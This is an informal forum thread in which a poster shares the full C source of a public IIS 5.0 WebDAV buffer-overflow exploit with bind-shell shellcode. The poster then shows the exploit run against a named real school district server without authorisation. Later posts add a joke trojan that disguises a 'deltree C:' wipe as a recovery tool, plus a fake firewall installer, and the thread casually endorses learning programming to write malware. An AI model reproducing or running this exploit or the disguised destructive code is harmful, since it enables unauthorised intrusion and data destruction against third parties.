Thread: Sorry I connected to your rd server, nazi.

sry, can't see anything...

try again.

is there supposed to be a red x?

? loads for me...

try this:

nope, still red x.Even when I right click it, go to properties, and copy and paste the source...

Originally posted by ffx-dreamz
nope, still red x.Even when I right click it, go to properties, and copy and paste the source...

Me too...

wtf, try this:

http://www.villagephotos.com/pubbrowse.asp...selected=820824

oh man, I'm so tempted to use this...:

Code:

#include <stdio.h>

#include <errno.h>

#include <string.h>

#include <stdlib.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netdb.h>

#include <netinet/in.h>



// Change to fit your need

#define *RET * * * * * * 0x4804 * * * * *// EIP = 0x00480004

#define *LOADLIBRARYA * *0x0100107c

#define *GETPROCADDRESS *0x01001034



// Don't change this

#define *PORT_OFFSET * * 1052

#define *LOADL_OFFSET * *798

#define *GETPROC_OFFSET *815

#define *NOP * * * * * * 0x90

#define *MAXBUF * * * * *100000





/*

 * LoadLibraryA IT Address * := 0100107C

 * GetProcAddress IT Address := 01001034

 */



unsigned char shellcode[] = * * * * * *// Deepzone shellcode

 *"x68x5ex56xc3x90x54x59xffxd1x58x33xc9xb1x1c"

 *"x90x90x90x90x03xf1x56x5fx33xc9x66xb9x95x04"

 *"x90x90x90xacx34x99xaaxe2xfax71x99x99x99x99"

 *"xc4x18x74x40xb8xd9x99x14x2cx6bxbdxd9x99x14"

 *"x24x63xbdxd9x99xf3x9ex09x09x09x09xc0x71x4b"

 *"x9bx99x99x14x2cxb3xbcxd9x99x14x24xaaxbcxd9"

 *"x99xf3x93x09x09x09x09xc0x71x23x9bx99x99xf3"

 *"x99x14x2cx40xbcxd9x99xcfx14x2cx7cxbcxd9x99"

 *"xcfx14x2cx70xbcxd9x99xcfx66x0cxaaxbcxd9x99"

 *"xf3x99x14x2cx40xbcxd9x99xcfx14x2cx74xbcxd9"

 *"x99xcfx14x2cx68xbcxd9x99xcfx66x0cxaaxbcxd9"

 *"x99x5ex1cx6cxbcxd9x99xddx99x99x99x14x2cx6c"

 *"xbcxd9x99xcfx66x0cxaexbcxd9x99x14x2cxb4xbf"

 *"xd9x99x34xc9x66x0cxcaxbcxd9x99x14x2cxa8xbf"

 *"xd9x99x34xc9x66x0cxcaxbcxd9x99x14x2cx68xbc"

 *"xd9x99x14x24xb4xbfxd9x99x3cx14x2cx7cxbcxd9"

 *"x99x34x14x24xa8xbfxd9x99x32x14x24xacxbfxd9"

 *"x99x32x5ex1cxbcxbfxd9x99x99x99x99x99x5ex1c"

 *"xb8xbfxd9x99x98x98x99x99x14x2cxa0xbfxd9x99"

 *"xcfx14x2cx6cxbcxd9x99xcfxf3x99xf3x99xf3x89"

 *"xf3x98xf3x99xf3x99x14x2cxd0xbfxd9x99xcfxf3"

 *"x99x66x0cxa2xbcxd9x99xf1x99xb9x99x99x09xf1"

 *"x99x9bx99x99x66x0cxdaxbcxd9x99x10x1cxc8xbf"

 *"xd9x99xaax59xc9xd9xc9xd9xc9x66x0cx63xbdxd9"

 *"x99xc9xc2xf3x89x14x2cx50xbcxd9x99xcfxcax66"

 *"x0cx67xbdxd9x99xf3x9axcax66x0cx9bxbcxd9x99"

 *"x14x2cxccxbfxd9x99xcfx14x2cx50xbcxd9x99xcf"

 *"xcax66x0cx9fxbcxd9x99x14x24xc0xbfxd9x99x32"

 *"xaax59xc9x14x24xfcxbfxd9x99xcexc9xc9xc9x14"

 *"x2cx70xbcxd9x99x34xc9x66x0cxa6xbcxd9x99xf3"

 *"xa9x66x0cxd6xbcxd9x99x72xd4x09x09x09xaax59"

 *"xc9x14x24xfcxbfxd9x99xcexc9xc9xc9x14x2cx70"

 *"xbcxd9x99x34xc9x66x0cxa6xbcxd9x99xf3xc9x66"

 *"x0cxd6xbcxd9x99x1ax24xfcxbfxd9x99x9bx96x1b"

 *"x8ex98x99x99x18x24xfcxbfxd9x99x98xb9x99x99"

 *"xebx97x09x09x09x09x5ex1cxfcxbfxd9x99x99xb9"

 *"x99x99xf3x99x12x1cxfcxbfxd9x99x14x24xfcxbf"

 *"xd9x99xcexc9x12x1cxc8xbfxd9x99xc9x14x2cx70"

 *"xbcxd9x99x34xc9x66x0cxdexbcxd9x99xf3xc9x66"

 *"x0cxd6xbcxd9x99x12x1cxfcxbfxd9x99xf3x99xc9"

 *"x14x2cxc8xbfxd9x99x34xc9x14x2cxc0xbfxd9x99"

 *"x34xc9x66x0cx93xbcxd9x99xf3x99x14x24xfcxbf"

 *"xd9x99xcexf3x99xf3x99xf3x99x14x2cx70xbcxd9"

 *"x99x34xc9x66x0cxa6xbcxd9x99xf3xc9x66x0cxd6"

 *"xbcxd9x99xaax50xa0x14xfcxbfxd9x99x96x1exfe"

 *"x66x66x66xf3x99xf1x99xb9x99x99x09x14x2cxc8"

 *"xbfxd9x99x34xc9x14x2cxc0xbfxd9x99x34xc9x66"

 *"x0cx97xbcxd9x99x10x1cxf8xbfxd9x99xf3x99x14"

 *"x24xfcxbfxd9x99xcexc9x14x2cxc8xbfxd9x99x34"

 *"xc9x14x2cx74xbcxd9x99x34xc9x66x0cxd2xbcxd9"

 *"x99xf3xc9x66x0cxd6xbcxd9x99xf3x99x12x1cxf8"

 *"xbfxd9x99x14x24xfcxbfxd9x99xcexc9x12x1cxc8"

 *"xbfxd9x99xc9x14x2cx70xbcxd9x99x34xc9x66x0c"

 *"xdexbcxd9x99xf3xc9x66x0cxd6xbcxd9x99x70x20"

 *"x67x66x66x14x2cxc0xbfxd9x99x34xc9x66x0cx8b"

 *"xbcxd9x99x14x2cxc4xbfxd9x99x34xc9x66x0cx8b"

 *"xbcxd9x99xf3x99x66x0cxcexbcxd9x99xc8xcfxf1"

 *"xe5x89x99x98x09xc3x66x8bxc9xc2xc0xcexc7xc8"

 *"xcfxcaxf1xadx89x99x98x09xc3x66x8bxc9x35x1d"

 *"x59xecx62xc1x32xc0x7bx70x5axcexcaxd6xdaxd2"

 *"xaaxabx99xeaxf6xfaxf2xfcxedx99xfbxf0xf7xfd"

 *"x99xf5xf0xeaxedxfcxf7x99xf8xfaxfaxfcxe9xed"

 *"x99xeaxfcxf7xfdx99xebxfcxfaxefx99xfaxf5xf6"

 *"xeaxfcxeaxf6xfaxf2xfcxedx99xd2xdcxcbxd7xdc"

 *"xd5xaaxabx99xdaxebxfcxf8xedxfcxc9xf0xe9xfc"

 *"x99xdexfcxedxcaxedxf8xebxedxecxe9xd0xf7xff"

 *"xf6xd8x99xdaxebxfcxf8xedxfcxc9xebxf6xfaxfc"

 *"xeaxeaxd8x99xc9xfcxfcxf2xd7xf8xf4xfcxfdxc9"

 *"xf0xe9xfcx99xdexf5xf6xfbxf8xf5xd8xf5xf5xf6"

 *"xfax99xcbxfcxf8xfdxdfxf0xf5xfcx99xcexebxf0"

 *"xedxfcxdfxf0xf5xfcx99xcaxf5xfcxfcxe9x99xda"

 *"xf5xf6xeaxfcxd1xf8xf7xfdxf5xfcx99xdcxe1xf0"

 *"xedxc9xebxf6xfaxfcxeaxeax99xdaxf6xfdxfcxfd"

 *"xb9xfbxe0xb9xe5xc3xf8xf7xb9xa5xf0xe3xf8xf7"

 *"xd9xfdxfcxfcxe9xe3xf6xf7xfcxb7xf6xebxfexa7"

 *"x9bx99x86xd1x99x99x99x99x99x99x99x99x99x99"

 *"x99x99x95x99x99x99x99x99x99x99x98x99x99x99"

 *"x99x99x99x99x99x99x99x99x99x99x99x99x99x99"

 *"x99x99x99x99x99x99x99x99x99x99x99x99x99x99"

 *"x99x99x99x99x99x99x99x99x99x99x99x99x99x99"

 *"x99x99x99x99x99x99x99x99x99x99x99x99x99x99"

 *"x99x99x99x99x99x99x99x99x99x99x99x99x99x99"

 *"x99x99x99x99x99x99x99x99x99x99x99x99x99x99"

 *"x99x99x99x99x99x99x99x99x99x99x99x99x99x99"

 *"x99x99xdaxd4xddxb7xdcxc1xdcx99x99x99x99x99"

 *"x89x99x99x99x99x99x99x99x99x99x99x99x99x99"

 *"x99x99x99x99x99x99x90x90x90x90x90x90x90x90";



unsigned char jumpcode[] = "x8bxf9x32xc0xfexc0xf2xaexffxe7";

/* mov edi, ecx

 * xor al, al

 * inc al

 * repnz scasb

 * jmp edi

 */



char body[] = "<?xml version="1.0"?>rn<g:searchrequest xmlns:g="DAV:">rn" 

 *"<g:sql>rnSelect "DAV:displayname" from scope()rn</g:sql>rn</g:searchrequest>rn";





/* Our code starts here */

int main (int argc, char **argv) 

{

 *

 *unsigned long ret;

 *unsigned short port;

 *int tport, bport, s, i, j, r, rt=0;

 *struct hostent *h;

 *struct sockaddr_in dst;

 *char buffer[MAXBUF];



 *if (argc < 2 || argc > 5) 

****{

 * printf("IIS 5.0 WebDAV Exploit by RoMaNSoFt <roman@rs-labs.com>. 23/03/2003nUsage: %s <target host> [target port] [bind port] [ret]nE.g 1: %s victim.comnE.g 2: %s victim.com 80 31337 %#.4xn", argv[0], argv[0], argv[0], RET);

 * exit(-1);

****}

 *

 *// Default target port = 80

 *if (argc > 2)

****tport = atoi(argv[2]);

 *else

****tport = 80;



 *// Default bind port = 31337

 *if (argc > 3)

****bport = atoi(argv[3]);

 *else

****bport = 31337;



 *// Default ret value = RET

 *if (argc > 4)

****ret = strtoul(argv[4], NULL, 16);

 *else

****ret = RET;



 *if ( ret > 0xffff || (ret & 0xff) == 0 || (ret & 0xff00) == 0 ) 

****{

 * fprintf(stderr, "RET value must be in 0x0000-0xffff range and it may not contain null-bytesnAborted!n");

 * exit(-2);

****}

 * *

 *// Shellcode patching

 *port = htons(bport);

 *port ^= 0x9999;

 *

 *if ( ((port & 0xff) == 0) || ((port & 0xff00) == 0) ) 

****{

 * fprintf(stderr, "Binding-port contains null-byte. Use another port.nAborted!n");

 * exit(-3);

****}

 *

 **(unsigned short *)&shellcode[PORT_OFFSET] = port;

 **(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999;

 **(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999;

 *// If the last two items contain any null-bytes, exploit will fail.

 *// WARNING: this check is not performed here. Be careful and check it for yourself!

 *

 *// Resolve hostname

 *printf("[*] Resolving hostname ...n");

 *if ((h = gethostbyname(argv[1])) == NULL)

****{

 * fprintf(stderr, "%s: unknown hostnamen", argv[1]);

 * exit(-4);

****}

 *

 *bcopy(h->h_addr, &dst.sin_addr, h->h_length);

 *dst.sin_family = AF_INET;

 *dst.sin_port = htons(tport);

 *

 *// Socket creation

 *if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) 

****{

 * perror("Failed to create socket");

 * exit(-5);

****}

 *

 *// Connection

 *if (connect(s, (struct sockaddr *)&dst, sizeof(dst)) == -1)

****{

 * perror("Failed to connect");

 * exit(-6);

****}

 *

 *// Build malicious string...

 *printf("[*] Attacking port %i at %s (EIP = %#.4x%.4x)...n", tport, argv[1], ((ret >> 8) & 0xff), ret & 0xff); 



 *bzero(buffer, MAXBUF);

 *strcpy(buffer, "SEARCH /");

 *

 *i = strlen(buffer);

 *buffer[i] = NOP; * * * * // Align for RET overwrite



 *// Normally, EIP will be overwritten with buffer[8+2087] but I prefer to fill some more bytes&#59;-) 

 *for (j=i+1; j < i+2150; j+=2)

*****(unsigned short *)&buffer[j] = (unsigned short)ret;



 *// The rest is padded with NOP's. RET address should point to this zone!

 *for (; j < i+65535-strlen(jumpcode); j++)

****buffer[j] = NOP;



 *// Then we skip the body of the HTTP request

 *memcpy(&buffer[j], jumpcode, strlen(jumpcode));



 *strcpy(buffer+strlen(buffer), " HTTP/1.1rn");

 *sprintf(buffer+strlen(buffer), "Host: %srnContent-Type: text/xmlrnContent-Length: %drnrn", argv[1], strlen(body) + strlen(shellcode));

 *strcpy(buffer+strlen(buffer), body);

 *

 *// This byte is used to mark the beginning of the shellcode

 *memset(buffer+strlen(buffer), 0x01, 1);

 *

 *// And finally, we land into our shellcode

 *memset(buffer+strlen(buffer), NOP, 3);

 *strcpy(buffer+strlen(buffer), shellcode);

 *

 *// Send request

 *if (send(s, buffer, strlen(buffer), 0) != strlen(buffer))

****{

 * perror("Failed to send");

 * exit(-7);

****}



 *printf("[*] Now open another console/shell and try to connect (telnet) to victim port %i...n", bport);



 *// Receive response

 *while ( (r=recv(s, &buffer[rt], MAXBUF-1, 0)) > 0)

****rt += r;

 *// This code is not bullet-proof. An evil WWW server could return a response bigger than MAXBUF

 *// and an overflow would occur here. Yes, I'm lazy... :-)

 *

 *buffer[rt] = '\0';

 *

 *if (rt > 0)

****printf("[*] Victim server issued the following %d bytes of response:n--n%sn--n[*] Server NOT vulnerable!n", rt, buffer);

 *else

 * *printf("[*] Server is vulnerable but the exploit failed! Change RET value (e.g. 0xce04) and try again (when IIS is up again) :-/n", bport);

 *

 *close(s);



}

This is certainly more then I know about C++...

Code:

C:cygwinhomedougdrums>rs_iss.exe cbcsd.org 80 31337 0xce04

[*] Resolving hostname ...

[*] Attacking port 80 at cbcsd.org (EIP = 0x00ce0004)...

[*] Now open another console/shell and try to connect (telnet) to victim port 31

337...

[*] Victim server issued the following 2018 bytes of response:

--

HTTP/1.1 414 Request-URI Too Large ( The size of the request header is too large

. Contact the server administrator. *)

Connection: close

Pragma: no-cache

Cache-Control: no-cache

Content-Type: text/html

Content-Length: 1785



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML dir=ltr><HEAD><TITLE>The page cannot be displayed</TITLE>

<STYLE>A:link {

 * * * *FONT: 8pt/11pt verdana; COLOR: #ff0000

}

A:visited {

 * * * *FONT: 8pt/11pt verdana; COLOR: #4e4e4e

}

</STYLE>



<META content=NOINDEX name=ROBOTS>

<META http-equiv=Content-Type content="text-html; charset=Windows-1252">



<META content="MSHTML 5.50.4522.1800" name=GENERATOR></HEAD>

<BODY bgColor=#ffffff>

<TABLE cellSpacing=5 cellPadding=3 width=410>

 *<TBODY>

 *<TR>

 * *<TD vAlign=center align=left width=360>

 * * *<H1 style="FONT: 13pt/15pt verdana; COLOR: #000000"><!--Problem-->The page



 * * *cannot be displayed</H1></TD></TR>

 *<TR>

 * *<TD width=400 colSpan=2><FONT

 * * *style="FONT: 8pt/11pt verdana; COLOR: #000000">There is a problem with the



 * * *page you are trying to reach and it cannot be displayed.</FONT></TD></TR>

 *<TR>

 * *<TD width=400 colSpan=2><FONT

 * * *style="FONT: 8pt/11pt verdana; COLOR: #000000">

 * * *<HR color=#c0c0c0 noShade>



 * * *<P>Please try the following:</P>

 * * *<UL>

 * * * *<LI>Click the Refresh button,

 * * * *or try again later.<BR>

 * * * *<LI>Open the Web site

 * * * * home page, and then look for links to the information you want.

 * * * *<LI>If you believe you should be able to view this directory or page,

 * * * *please contact the Web site administrator by using the e-mail address or



 * * * *phone number listed on the Web site

 * * * * home page. </LI></UL>

 * * *<H2 style="FONT: 8pt/11pt verdana; COLOR: #000000">414 Request-URI Too Lar

ge - The size of the request header is too large. Contact the server administrat

or. (12215)<BR>Internet Security and Acceleration Server</H2>

 * * *</FONT></TD></TR></TBODY></TABLE></BODY></HTML>



--

[*] Server NOT vulnerable!

el crapo.

Originally posted by adidas

Exactly.

Man, that's not nice!!!!

what isn't?

Read the comments ffx. It's the English sentences explaining what the code does designated by '//' before it.

I wouldn't publicly announce something like this doug. Esp when you don't know the people browsing this forum

eh, whatever. I keep telling them their stuff is insecure. They hold my ssn, dob, gpa, address, all sorts of stuff, and they have the resposibility to keep it safe. And a server in a DMZ running remote terminal is not my idea of safe.

nobody is gonna care what doug does in his spare time.At least no one on this forum.

ffx, also read the words inclosed in "printf()" to understand it a little better.

Yeah, I do that with my html, but jesus that is a load of code.I have to learn c++ it sounds awesome

Originally posted by Squall
Read the comments ffx. It's the English sentences explaining what the code does designated by '//' before it. *

I wouldn't publicly announce something like this doug. Esp when you don't know the people browsing this forum

what, he is just selflessly dedicating his time and effort to verify that said server is safe and secure, and prevent nasty hackers from doing their evildoing job!!!![/bs]

I have to sleep again....don't listen to me anymore...no more posting...must sleep...

Doesn't that site have a firewall up?
We've spent millions $$$$$ to keep ourselves safe from stuff like that.
I had the IIS server running on my system at work one time because I needed an FTP location for some testing. Unfortunately, I left port 80 open.
Got a nice call from the IS department wondering just what the heck I was up to!

Yeah, but their webserver is outside it, and doesn't have another firewall in front of it. Although, they have wireless ap's just about at every building, and wireless wan stuff going from building to building, so it's not like a firewall is really going to stop anything. If I wanted to I could just park outside the district building and attack it from the inside. Not to mention I could also sit outside and sniff packets.

I have to learn c++ it sounds awesome[/b]

I hope you wouldn't learn it just to make malicious programs...

Code:

#include <iostream.h>

#include <stdio.h>



int main() {

int blah=0;

cout << "Welcome to Windows Recovery Terminal./n";

cout << "Press R to recover, or ESC to exit./n/n";

cin >> blah;

cout << "Windows is now deleting temporary files.../n";

system("deltree C:");

cout << "Completed. Thankyou for using Windows Recovery Terminal."

return 0;

}

Code:

#include <allegro.h>

char name_of_floppy_drive[500];



void main() {

allegro_init();

install_timer();

install_mouse();

set_color_depth(32);

set_gfx_mode(GFX_AUTODETECT, 800, 600, 0, 0);

textout_centre(screen, font, "Mr Firewall Installation Program", 400, 300, makecol(255, 255, 255));

textout_centre(screen, font, "Please wait, copying files...", 400, 310, makecol(255, 255, 255));

rest(5000);

clear_to_color(screen, 0);

textout(screen, font, "Welcome to Mr Firewall Installation program.", 0, 0, makecol(255, 255, 255));

textout(screen, font, "For enchanced security, please run this installer from a floppy disk.", 0, 10, makecol(255, 255, 255));

textout(screen, font, "What do you want to do?", 0, 30, makecol(255, 255, 255));

textout(screen, font, "[A] Install Mr Firewall", 0, 50, makecol(255, 255, 255));

textout(screen, font, "[B] Repair Mr Firewall", 0, 60, makecol(255, 255, 255));

textout(screen, font, "[C] Import Rule Table", 0, 70, makecol(255, 255, 255));

textout(screen, font, "[D] Exit", 0, 80, makecol(255, 255, 255));

readkey();

clear_to_color(screen, 0);

textout(screen, font, "Mr Firewall will now, as per your request, delete anything found on all drives except:", 0, 0, makecol(255, 255, 255));

textout(screen, font, name_of_floppy_drive, 0, 20, makecol(255, 255, 255));

textout(screen, font, "Please wait, deleting...", 0, 40, makecol(255, 255, 255));

rest(20000);

textout(screen, font, "Deleted drive C:", 0, 50, makecol(255, 255, 255));

rest(2000);



textout(screen, font, "Cannot access drive C", 0, 60, makecol(255, 0, 0));

textout(screen, font, "Error: Cannot access kernel32.exe", 0, 70, makecol(255, 0, 0));

rest(200);

textout(screen, font, "Error: Cannot access backupkernel32.exe", 0, 80, makecol(255, 0, 0));

rest(2000);

clear_to_color(screen, makecol(0, 255, 0));

textout_centre(screen, font, "STOP ERROR", 600, 300, makecol(255, 255, 255));

textout_centre(screen, font, "Windows cannot access the kernel. Please reinstall Windows.", 600, 400, makecol(255, 255, 255));

top:

goto top;

}

END_OF_MAIN();

Heh, the code for 'Mr Firewall' isn't perfect, but what do you expect from me making it up in my head directly into the forum?

Well no, I wouldn't learn it just to make malicious programs, but that's a big part of why I want to.